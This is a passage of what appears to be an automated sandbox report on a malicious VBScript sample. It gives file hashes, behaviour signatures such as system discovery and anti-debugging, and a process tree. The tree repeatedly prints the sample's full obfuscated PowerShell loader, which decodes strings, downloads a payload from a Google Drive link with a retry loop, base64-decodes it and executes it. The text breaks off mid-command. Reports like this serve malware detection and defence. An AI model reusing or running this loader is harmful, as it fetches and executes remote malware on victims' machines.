Overview

overview

10

Static

static

1

c11ce59529...0c.vbs

windows7-x64

8

c11ce59529...0c.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24/09/2024, 01:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c.vbs

  • Size

    20KB

  • MD5

    b4b8045f84ab0b8229af71524f891fb4

  • SHA1

    f43aad4d678ba2e259b5a357aecb19d3329e03e3

  • SHA256

    c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c

  • SHA512

    0424d77750ca1a1d78932162a5e4c223c805bdc3c82c960c24b2512d439992953b1aec2b872c09e18901a81a3fd02d5b08575d0edccf0ec0d5b5ef887aa6421d

  • SSDEEP

    384:ADlQ3GOmBsxCnQ8tcIgn9csOkKENYbXfzuzLfEO7FLpoMMqQW59Bh:B39cs8QqYesWEuXfnudoMDb

Score
8/10
discovery

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • System Time Discovery 1 TTPs 3 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c11ce5952945bc69335b4fa0f12cf90598a0f5bb6cad90ab495211bdc2aa3e0c.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
      2⤵
      • Blocklisted process makes network request
      • System Network Configuration Discovery: Internet Connection Discovery
      • System Time Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Separatisme.Cou && echo t"
        3⤵
          PID:2600
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • System Time Discovery
          • Suspicious use of WriteProcessMemory
          PID:1684
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Flyspecked kle dagligsprogsfilosofiens Cistori skaberaktapirers Overbarish #>;$Cognomen='Clinometer';<#Bonusbelb hokku Dalapon Satellitters Udviklingstidens Unrefusably #>;$scatologic=$host.PrivateData;If ($scatologic) {$Fodballen++;}function godkendelsesbefjelsernes($Embodier){$Makroredigeringrredeemableness=$Embodier.Length-$Fodballen;for( $Makroredigering=4;$Makroredigering -lt $Makroredigeringrredeemableness;$Makroredigering+=5){$Fortolkeren149+=$Embodier[$Makroredigering];}$Fortolkeren149;}function Selvtugten($Cardiameter){ . ($Toldgrnsers) ($Cardiameter);}$Unembarrassed=godkendelsesbefjelsernes 'UneqMSarco iszInteiOverlReprlMyoeaPres/Ugun5 Irr. Ka 0Mist Grou(MiddWSa viUnvnn F odReruoCalcwHaems ga, TweeNSammT Tr Meni1D gl0Resa..haf0 im;Euda BrutWUn.fi TeonL ad6Gade4Hvin; O,n FouxWind6locu4 Far; Non Mun r SelvForm: S o1bran2Moto1Jako. haw0Pira)C pa BowdG indeTrykcHegnkUnrooBack/kiri2Mand0 ,nd1 Gem0Theo0 Cry1 esi0 olk1S ud KlirFCr.aiF rar ndie TagfBumsoDisex Gir/Rees1B ud2 Tnd1Fede.Folk0Pris ';$Ethyls=godkendelsesbefjelsernes 'SkysUModiSSubteAlloR Val-CereaSpilG TreeGodtNGaratAbes ';$Kompasnaals=godkendelsesbefjelsernes 'prechP.lotKom tSpripSpirs dyg:B so/Kurv/ VandColerUndei ermv supeKilo.,enngNontoSka.oMikrg M nlBr ieUeni.Du,tcSideoF rbm R a/ .viu .emcerfa? LoveBeluxSprjp cheoHuc rI dht Uns=Tr.fdjamnoRelaw emonUngelFor o,runa vid pre&UdkaiElled ,re= Dis1Rein2F skdLoosZ aceCC ocmSupev Kr pByg VStafSUne.9Afs eGolfJSkarUKrigIMil aGrynKVil 7 StuOValu8 Mon7 su AReoppSpilyMossyYaleDPhensWom 8Su.cBDistz Gem5 Repy Elbp Qua ';$Adresseoplysningers=godkendelsesbefjelsernes 'Zol > Va ';$Toldgrnsers=godkendelsesbefjelsernes 'Commi K,ieFlurxafb ';$Lunede='Overaffliction';$Middlehand = godkendelsesbefjelsernes 'Hypee UrecNetthstonocolu rst%Sprja redp L gp La dSpiraIndstAca aFina%Gene\G.maS InseAfpopScenaCa ar I.haT kstekspi DmpsbegrmEpigeDand. PiqCdansoEmbau P l Cirk& el& Je Spore Go,cinnehrepro omp L,bet Tal ';Selvtugten (godkendelsesbefjelsernes 'Lovt$GunngEr slCommojannbdeagaSyntlu in:,rukTDouzrHor oK.rtvHoosrSkivdCap iForhg DecsG vttKyaneG nn=Emis(VuggcKousmOsphd K u Bist/Bredc Sid Kil$T,utM ba iP,eddg ofdM,llldumpeAgadhfougaFi rnUme dUdar)Arve ');Selvtugten (godkendelsesbefjelsernes ' ,ta$Haf.g Purl Supo drabSteea ypslKlov:UsigUStadd olee Chen Sp eKartuDommrChaloPhylpFagoiAmnesUnbakBaldeSteesgoss=.iso$AnorK SnaoTr.kmEx.opCru aPerss Spnn Eksa Ex.aDipll twisSpjl.Trres ,irpIngol BroiFejltac,e( S.c$PoliAUdpodZirarKremeGy esGu,ss G.ue Kn oAdmipKon lTum,yAdulsO.ern Ba,iKassnPiktgByfoekonjrTekks Uru)Sync ');Selvtugten (godkendelsesbefjelsernes ' Qu [ForvNS edeAdvot Fl . idS,sefeTykhrZo gvLoc i rancLarrePre P eeoHaliiAfhnn VertCitrM Di aArben PreaPomegSod,eFrotrDisc]Beli:subm: arbSTa seKluncImpruefterFal,iB.smtKl,nyNon P .elrPal.o P.ttStn oAgencmet oT.lelFrat Inco=D bl D re[OverNagazeKernt Lg .TrevSYppeePickc.eksu LanrFumei ,eltAmp yfilmP NatrAmoroRotet GreoE stcPro oAntalskorT aryBisepenr,eFlom]Kavi:Gyne: aviTKlamlUdsts Af 1W.nd2Fac ');$Kompasnaals=$Udeneuropiskes[0];$Landfogeds= (godkendelsesbefjelsernes 'Sulf$G neG ErtLIganO icaB srla Ju L nfe: TilrSkipGAdmie op lHo eS O eEVetuSIndePChiriValeN,rumDRosmeZoo SRepe=men.NSpekEBukswHels-FremO M.dBStr,j CheE EftC Uddt Pat SpecSI,teYFlsks Sa T OveENakkMen o.CyrtnIngeeSengTdeto.BlacW SkieAphab strcEjerLDybdIConcePro NSplaT');$Landfogeds+=$Trovrdigste[1];Selvtugten ($Landfogeds);Selvtugten (godkendelsesbefjelsernes 'Ha v$BlafR Kong Pfde.rdel UnmsAf eeVolusAmbupSupei T rnSlrud Ka eMis sUdtr. strH Roke H gaAmaldAfspe MaarBynks T r[Omst$ UncEAt,otPenghE ily Be lMorasDipn]Esco=patr$S ncUVn en TileholmmPreab Br aEyotrSli rTapia Pess Blas.ytheN npd ala ');$Dovelike=godkendelsesbefjelsernes 'Sols$San R angSpr eTm el.vers undeMenusCannpMis ifdesnEurod kameBismsSamm.St pDSkaao H ewIchtn,avklSubco RefaP icd SkaFFor iv ndlSwareEkse(Mi.r$grylKTidsoBefomDgnfpAnd aLnmosbermnFetta HetamisslSt nsRums,Publ$Ko fILentnClercPercas arp BugaInsacEstliSuprtBlomaTm etPhloe I r)P ak ';$Incapacitate=$Trovrdigste[0];Selvtugten (godkendelsesbefjelsernes ' unc$Tr ng AlmlSpinOPyrrBurana Ti l Ca,:KortCStraa P.sRL trrFavoySandoValgvdykseUdklr Hos=Camp(M,ndTB ebEO.tiSM rftStav-Une,PReinApoteTLideHQuot Ark$JaanIGossnTingc.avaABevep ehAMeazCRetriatteTRockA ShiT nicEteki)S,uf ');while (!$Carryover) {Selvtugten (godkendelsesbefjelsernes 'Hu k$ ughgKartlNonaoNo dbForuaOverlFrid:Ran,DMinoiI,dpaprofs Tr k Ro eRu luV.sca iss BejiSabbsm.ll= For$VidetRedor PepuRe.oeScu ') ;Selvtugten $Dovelike;Selvtugten (godkendelsesbefjelsernes 'at,oSceritK bla RevrF.rutSeco-Man SAna l v leLveteSta pDrey Ly s4Reco ');Selvtugten (godkendelsesbefjelsernes 'Terp$BatogChlol OstoAarrb aaa attlEpos:WestC PolaIndurBevgrOv,ry etio EvivAfs,eFilir E s=Ware(Sy lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira 